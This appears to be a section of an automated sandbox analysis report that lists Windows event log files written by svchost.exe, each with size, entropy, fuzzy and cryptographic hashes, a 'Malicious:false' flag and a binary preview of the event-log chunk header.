                                                        Encrypted:false
                                                        SSDEEP:384:Ny2/hDGCyCkCzCRCFCNClCuC6CoC9rC6CdCsCvCkxCkC5CCCWCxCIC/CbCFC5CkG:Ny2/dm1sR
                                                        MD5:B0BF4D9EC91ABBDA5D328631B125A5C0
                                                        SHA1:E672D69127AE7C1A51046ADAA911871EC0C10ABB
                                                        SHA-256:8DBE6F5B80B3D973BBF1177BCCAA690B9F90FC99DC358B7DE66175317C733501
                                                        SHA-512:3132E1FCC5C8F88BD974465EA1E644CA89C2D9E041E49F8A1F48B9ACB3376F0A1042F5CB6FDFC6BE2934C4483312C35539D64DB25B892388604F9F637074BCBD
                                                        Malicious:false
                                                        Preview:ElfChnk.U.......~.......U.......~....................}/.....................................................................@..................F.......................n...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................v..................................**..0...U.........Df..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):4.488768580471203
                                                        Encrypted:false
                                                        SSDEEP:1536:Q9YcieRoUlafdbkKKMAQ2SomvXCQv/2ketsvQPh8YzSJoh2VgPIEF6uq9GgCVRlW:Q9YcieRoUlaFbkKKMAQ2SomvXCM/2keU
                                                        MD5:E3FB1708C64D250E4D801AFB8688DF35
                                                        SHA1:8B889F0358683733257411E451A86E3A1D42159D
                                                        SHA-256:0B62FDD9A57B1809D79561AE64BE30DD7430815D6954A5E3DF90E29E1B2E6C72
                                                        SHA-512:2F5CC514B180A39E5961452A594FE5384A6369CBCB7A1CEBAC37948770A6CB999A2E2F26A32240058D5D7A335904DAF40C88F1C096D8F85907F23E9B32E79ABE
                                                        Malicious:false
                                                        Preview:ElfChnk.........$...............$.....................w.........................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...................................................V...................................**................o...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):4.4977157302559725
                                                        Encrypted:false
                                                        SSDEEP:1536:HcRFkL1TWX0gkB/J7oasEfyk2/vKlqRi/PgTZSXwyvy8fJpfrAW+Cr6SXlUr20Gy:HcRFkL1TWX0gkB/J7oasEfyk2/vKlqkK
                                                        MD5:6D2504DD395F5A41EA44AAE3526F8BF3
                                                        SHA1:7E24C2BEF3B300DC514EB6C2E72971D1B8E1A711
                                                        SHA-256:0027C48343D5E8A308B48A357F2FF7BB8D8484C0EC1F9B9B1F840A5D937DED56
                                                        SHA-512:504E03F873C07A0AC9A81DFD78265814217D8F42130829C95C7BDFC6359F0B9D20E0B229767E26F25731E2F415628A399F1E908D3CB194FA0640C222FCC33608
                                                        Malicious:false
                                                        Preview:ElfChnk.>...............>...........................|!.......................................................................wp.................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................A...............&...i.......~......................**......>........Q.U..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):4.494457161353947
                                                        Encrypted:false
                                                        SSDEEP:384:ZhN7s7o787l7r787a7J7z7+7N17g7x7c7g7gY7hZ7D7k7F7r7wm7NP7Y7+7fa7lX:Z9vuCg
                                                        MD5:2C68AC8F7DC18D0B9BE4EC15DA85A3A3
                                                        SHA1:E097A815A66A6A0866BE30DFA0E887A5DEBA1849
                                                        SHA-256:3209650E56ECAA5ADD7CB341D9D48591E5691D7B237E34D8C35F453ECFFC7B1A
                                                        SHA-512:C01412A6097E2E9F6EA913E6A1F545A19323B14EA529094E2FC9555EE28A8586883BCD4DE93FFE03C0FE327D73EFCFD9A0C96A091077FC12A066CEFF21C8D4E5
                                                        Malicious:false
                                                        Preview:ElfChnk.Y.......g.......Y.......g............%...&..}..J....................................................................uC.s............................................=...........................................................................................................................f...............?...........................m...................M...F...........................................=...............&...............................................................s.......................**......Y........................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):2.1499045494600955
                                                        Encrypted:false
                                                        SSDEEP:384:Dhc+uaNuru+uhuKVuPJu5u9u4ufuTuxuDuvuDuOuXumui+udutui4uTAuFuauind:D6Ovc0S5UyEeDgLslstY
                                                        MD5:2045FB0D54CA8F456B545859B9F9B0A8
                                                        SHA1:35854F87588C367DE32A3931E01BC71535E3F400
                                                        SHA-256:E4305D5E1125E185F25AABA6FF9E32DE70B4EFD7264FE5A0C7C2EF3C33989C45
                                                        SHA-512:013CAC4CBF67C9AB5D2A07E771BAF81950E5A256F379E3C2E26CC9E8E47379579470CC6FD56E93B31C4D17935713D1FC6026307427D77CBE9647139E3D73AC47
                                                        Malicious:false
                                                        Preview:ElfChnk.........;...............;...........xk...m...+.....................................................................F.~.................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................6f..w...............................**...............&3..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):0.8164696340947971
                                                        Encrypted:false
                                                        SSDEEP:384:jhGuZumutu4uEu5uOuDuyb2uPu1uRu3uGuHu9/u:jr
                                                        MD5:1AB19FA472669F4334C7A9D44E94E1B3
                                                        SHA1:F71C16706CFA9930045C9A888FDB3EF46CACC5BC
                                                        SHA-256:549D89A256E3C71AFCBF551EC9BEDBDB3CF2DC74B4F8C214FDC1D270FB731F6E
                                                        SHA-512:72F1F20CB1F2984B318E4A2AAEE11D573441A77D04C0577D24E19F89E85F1691CB29EF569BD25EBBBD313C7B9DB945DB43D52EEFC2EF33E7BEECDFB8E0BBC404
                                                        Malicious:false
                                                        Preview:ElfChnk...................................... ..x$../..........................................................................<................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................!..................................**..............Wy.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):0.9855903635327656
                                                        Encrypted:false
                                                        SSDEEP:384:cxNhPALAb/A0D6AKAlAfyVAQhAQueA4AIAwA0AYAwA+/AfAjrA3DA:cxN90yzXd
                                                        MD5:7BCA54AC75C7185ADFBB42B1A84F86E3
                                                        SHA1:AD91EE55A6F9F77AD871ACA9A5B59987CA679968
                                                        SHA-256:A43B1365211A968B4EC3F9EC7489D05AD9EED30D3EE0CCD89860D20DFE1914D4
                                                        SHA-512:79A04DCE951528E09F7580E797E38D58CFC556EFEC032C3E68C701D720E01CBDCA3D4F27C309D50B9096570787A0E62B2C69236D148AC9C216CB13AA05E9619F
                                                        Malicious:false
                                                        Preview:ElfChnk.....................................P+...,...0........................................................................9.................B.......................j...=...........................................................................................................................f...............?...........................m...................M...F...........................U.......................%%......&...................................................>...........................E.......**..............o.m...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):3.165454452307923
                                                        Encrypted:false
                                                        SSDEEP:384:ghVpIcpBUpBxpBapB3pBEpBZpBKpBV1pBApBppBTSpBcu1pBspBlpBABpB7pB0py:gd+uXvB
                                                        MD5:B6B6F199DA64422984403D7374F32528
                                                        SHA1:980D66401DFCCF96ADDDAF22334A5CE735554E7F
                                                        SHA-256:8F65F81EE28F48B5007E04842ACC9DE20794A59E2759C2F35F7C10730A1EF7BF
                                                        SHA-512:5B0EFBF1C57BACF347790EB5915AFCFDDDDAFA7761D94DF1341C4E79F5B16DA3FAC2C9653C3DC41B80E31EA44AE46F4FC95C6EC0FFA0A0D3C05C69CED6955DE4
                                                        Malicious:false
                                                        Preview:ElfChnk.........'...............'...........P.......H:Z.....................................................................gO.................. .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................f..................................**..............m.................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):3.8519554794255333
                                                        Encrypted:false
                                                        SSDEEP:384:WhtbpwV1pIvpLfpvQpw2pQYph15pcApLqBpJxTp0qo8psfp4yp4Rphe3p7PpLWBZ:WwDoh1VqKVvcVU
                                                        MD5:4140628CA3CEC29C0B506CEEBDF684F6
                                                        SHA1:A2B70496C8E91D8E78AA04976B25D850ABAC6E1C
                                                        SHA-256:1823149759A2F1771ACE7B6BE14A0FEFC6F93DD9F81AC1024E6B41C2CCBFD8B0
                                                        SHA-512:779A04771A8E9B2F501FE1251F0D56C5B5988911F6067082D84FF1DBCF5D9281E32DF6CC2C995843EA1FCED748548DC116706E0F738B6510B47C2B3A0EBAA126
                                                        Malicious:false
                                                        Preview:ElfChnk.\...............\.......................0..../........................................................................v................*.......................R...=...........................................................................................................................f...............?...........................m...................M...F............................................;..............&...................................i...................................mS..............**..8...\........=..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):1.1642919553794224
                                                        Encrypted:false
                                                        SSDEEP:384:bhwCCRzCaCkClCzCYC/CyCVCGCMCvCNCACCxC/CLCoiC:bKFb
                                                        MD5:D7EECF043241FDB9486580582E208603
                                                        SHA1:045D5672A8E9884B78CD31C52D372375503CBF4F
                                                        SHA-256:6F3BE76FC00FE21C18A904058F2AF850204488187187C9B8C4BF11EAA03EC6C0
                                                        SHA-512:6738CD1D4081AD78CCC1E3E7AC46A394D9AC32906B4688E34DCCBBA42153FB826484C854F42FFF619DC8D50CAE708585B422F3EAA3A0219AAD19DC0962910125
                                                        Malicious:false
                                                        Preview:ElfChnk.....................................02..h6...u'.....................................................................1..................V.......................~...=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................V2............................../...**..p............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):4.611480364194825
                                                        Encrypted:false
                                                        SSDEEP:384:BhVMpYQMdYJMdYwMsOM6UMmMWaMJMbMcMEMBMkM7MQMrMBYQM5JMg0dMtMnMS8Mq:BOFCRbf+GkoeiDpbH
                                                        MD5:F7CBF10547CD1D43490830916EC54BAA
                                                        SHA1:C252BAF129424AB1416D8BE19D45D3FB97A806BB
                                                        SHA-256:E0466E5DE3C691AABE630128BB0337B444475D0DF1328B389F57AFAE3459089B
                                                        SHA-512:77E8A4DC89BCE00E9A9E5FAE96CBF403BE45976C89E13F8A0C8C41BA4646F79BBD33B332D9F2F11BB519186513B525145E603E42D71D8374A18F67CD5CF9BC3C
                                                        Malicious:false
                                                        Preview:ElfChnk.........C...............C..........................................................................................W.Q.........................................4...=...........................................................................................................................f...............?...........................m...................M...F................................=..........................}...................................................&........B..........................**..0...........}<z...............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):1.1787704450569538
                                                        Encrypted:false
                                                        SSDEEP:384:khL6UsE0ZUmxUmgDUmSUmKUmgUmlUmB8UmCUmeUmNUmtUmxUmqAUm:kY7Lv
                                                        MD5:30C8639676FC18AD4DD91F57C68DE4BF
                                                        SHA1:036B5574A8C22C4CF272515BF36367D92703894A
                                                        SHA-256:8FA1621B5F3777ABB820E7B6E265FDCBA2CBEE2BAC0FF1D48884DBA5743B896B
                                                        SHA-512:8090825C343D0291E490F2E05549B5650F698A45D4E0188041A0811B283E9FE9A65060C77F8A888DCE82A380220E2847286D3D3D70DB94CF883F2DA0C01E2082
                                                        Malicious:false
                                                        Preview:ElfChnk....................................../..(4............................................................................[................ .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................&..................................................................................../..................................**..............a...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):0.2040973025675846
                                                        Encrypted:false
                                                        SSDEEP:48:MltW4vsrP+MZQNRBEZWTENO4bpBkof4df/6FgVt:uD6KNVaO80ofef/6Fg
                                                        MD5:D3068F76AB8B5C986CE0CD4F214A25AA
                                                        SHA1:A68E70F39380931E35AE987036A75B7B6634220E
                                                        SHA-256:826C500714315CF43735691AABD8B559F85C763EE5FC5DC058E4873A2FEFB19E
                                                        SHA-512:EDFCC59A58FA1CECF401D2CC58955846A4E80056BB592986D8BE35E14F8CBABD9F78E2EE03FC11C722FBDDB32AA9CB61AAF5F17C544D8587935086B4F0842F08
                                                        Malicious:false
                                                        Preview:ElfChnk.............................................w.Lq.....................................................................6.f................ .......................H...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**................m...............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):1.6469884746870727
                                                        Encrypted:false
                                                        SSDEEP:384:/hpivNiGiriPiYiriDfiS83i0iGiTiYiUisiuiZi+iTiciUiQiJiUiBi4i/iAixQ:/G7t8H
                                                        MD5:FC81D9FBA555C6BC7223594B8F6B46DE
                                                        SHA1:971F47CFC0E1DCA462928DA2D8BE2B16D5A0629C
                                                        SHA-256:9933922E09C49C5BA80292C4AED9EC9F457031E90B28B421DFFBD2F1BB840671
                                                        SHA-512:7F2705E7526B49F76C5F2A76A88B83FC10591BAD68B451F5C67F841322076D4B408FC515EA59E0919907C73CBBD149AB5B5EE981083A52C9E90EC9FBFAD5254F
                                                        Malicious:false
                                                        Preview:ElfChnk.y...............y................... Q..(S...b.......................................................................t..............................................=.......................#...................................................................................................f...............?.......................P.......................M...F...............................................................................................................VG..................................**......y..........:............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):3.4105971138868307
                                                        Encrypted:false
                                                        SSDEEP:768:Yla0NnaaEarafana7abava3anaDa7a7ajaB1aPa7aDabanananaHa7ajaTa7aPaa:cNl
                                                        MD5:FC0BAB49ED66704837893A81C7CD2BBB
                                                        SHA1:9A31E152427CBA778CC7895CC77EAAD18A56D9D0
                                                        SHA-256:5B9AD00E45B47DFBFA58F6C5F11B09FC38BE99ACE2DAAEDE0C6F199580FFAD93
                                                        SHA-512:956A4BE70B816D12F0FAD4AD740CD0C5745F0A5676155E846CDDC6086822720428D8F79116C885D5A36684D17291E7006E52C235CB4EF362F43D310074CBC352
                                                        Malicious:false
                                                        Preview:ElfChnk.........@...............@...............`...xx........................................................................P.................`...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................9...................................**..H.............:...............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):1.3132453844344478
                                                        Encrypted:false
                                                        SSDEEP:384:hhaXJb4+XJcXJsXJrXJQXJIXJdXJkXJuXJyXJLMXJnXJRXJtXJLXJjXJppXJ:hQ0yUkNYwD8imLE5nTtFpf
                                                        MD5:6237EE0458A0478242B975E9BB7AA97D
                                                        SHA1:6B0BDBA887DA21675A63FC73AED995B1BCA3F6B1
                                                        SHA-256:C8E224C54278C206302EAD7011ACC48CAC60E7638E32EE70653190DBC90FA70A
                                                        SHA-512:56C025C971F77AB8E911E0190E8AB5CF533A909C1BF4558876FB2761AAA381CB7D21E44A3273FA4427CB2FF7DEECC15A312DD2A424B96ABDC4886BDF233F30E9
                                                        Malicious:false
                                                        Preview:ElfChnk......................................<...A.........................................................................i,.q................j...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................<......C...........................**..............@V.$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):4.325262033408211
                                                        Encrypted:false
                                                        SSDEEP:384:6hYmn9moomUmKBmZOmZmlmmmomRmemtmsmimGmHmEmqmwmHmLmlm9mGmdmpm3mfO:6/fGTDcx
                                                        MD5:D13189B45679E53F5744A4D449F8B00F
                                                        SHA1:ED410CAB42772E329F656B4793B46AC7159CF05B
                                                        SHA-256:BAA80D6A7DC42752766B1862A00009A1D76B57022A4D5A89692DBA2D6866EBA1
                                                        SHA-512:83399CE082F8C6D2917B8363E053C770F2783B3D086F39736919FBFA533DF65993A3B7840A2E1000B08948584CF9750C27961BF8A7BE3A235B5DDD779616013F
                                                        Malicious:false
                                                        Preview:ElfChnk.....................................h.................................................................................-.................X...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................1...........&.......................................................................................**..x...........~_g...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):0.7947046118743749
                                                        Encrypted:false
                                                        SSDEEP:384:jhr2zS2o202AW2D2t2l292l2V2p2d2N2:j8Q
                                                        MD5:55E73A924B170FBFFF862E8E195E839A
                                                        SHA1:3C625D05DFC08AE9DF26AEBAA82D72FC9F28ADB0
                                                        SHA-256:1B36D85AA56A023F6646D6EF28C9DCB5358528274EDCC9B6ED20705E3007E8A2
                                                        SHA-512:E14D32569F37A827EDBD1F02667866431C856D087A396933DE5E9B87943369C4802D220557050C7B0FE9367FBD0683676776E6D3CCBCB290C9F30D86EC529E28
                                                        Malicious:false
                                                        Preview:ElfChnk...................................... ..X"...........................................................................?.................Z...........................=...........................................................................................................................f...............?...........................m...................M...F...............................3...........................&.......................................................................................**................................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:modified
                                                        Size (bytes):66808
                                                        Entropy (8bit):4.3658295704348555
                                                        Encrypted:false
                                                        SSDEEP:384:NgRYNkBxxhSRumRtRqR5RVR+rRvR3RFRXRmRbR+RLRlRFRDRiwhR3KR31RIRB8RT:N3NwxA8nPLGbKNj
                                                        MD5:470541D95F1FC08759E8F2DFE12F6CE4
                                                        SHA1:A70EB7B3EC5682AE241E30900060DB71D3E4A218
                                                        SHA-256:81E038AB1A91B694863827EE8A36814FE8883A512B26637A3606D37B37787C68
                                                        SHA-512:E7C5576F49C0DCF55A567C65CC45393BC9655FACF9CB935E89EA32D5CFAF9C3A2CEA0E2BC0C3520A5E8DD54F9BC4BBD0E5965889324F1D758E848D4626429A0C
                                                        Malicious:false
                                                        Preview:ElfChnk.....................................................................................................................v......................y.......x..N...........=............................................y..................}y..3...........................................c......xb..f...h.......lc..?.......................h........c......M.......M...F...9c..............................................Qb..............................................A.......i.......................&............x..**..............X..)\M.........x68................................................................<.......T.....!................@X..)\M...W...YLC..g..E.....T........................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y.......#F.~.J.{..M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y./.O.p.e.r.a.t.i.o.n.a.l...(~K.6.......N...............................{.1.A.D.6.9.F.D.5.-.0.8.2.1.-.4.B.C.C.-.9.8.2.1.-.C.6.F.B.9.9.F.3.F.4.2.F.}...J.O.N.E.S.-.P.C...J.O
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):4.273338343434408
                                                        Encrypted:false
                                                        SSDEEP:384:mhWhjhUh4h4hthXhzh8cghshqh9hihXhMhxhzhwhohGh5h3hShChWhzhLhahYhC1:mBsFpkBjOFK
                                                        MD5:C37372EB51AEDB4552CB839C7294403A
                                                        SHA1:7B7C408D72B084CE36AA6B623AC6B907FD21D569
                                                        SHA-256:C3B5D9D16F88507EF69A9B6FF8581AEBAFF84D254F62CD4E75B6A9C6F93E93C4
                                                        SHA-512:69183719C29FCE5CEDB2634579ABA9FEF835A3CDC7668BB741F9DB36050756C088FD331E898DA8E4850887FD217B939DF1C5A3E7D73D2260CB3AC3570E71718E
                                                        Malicious:false
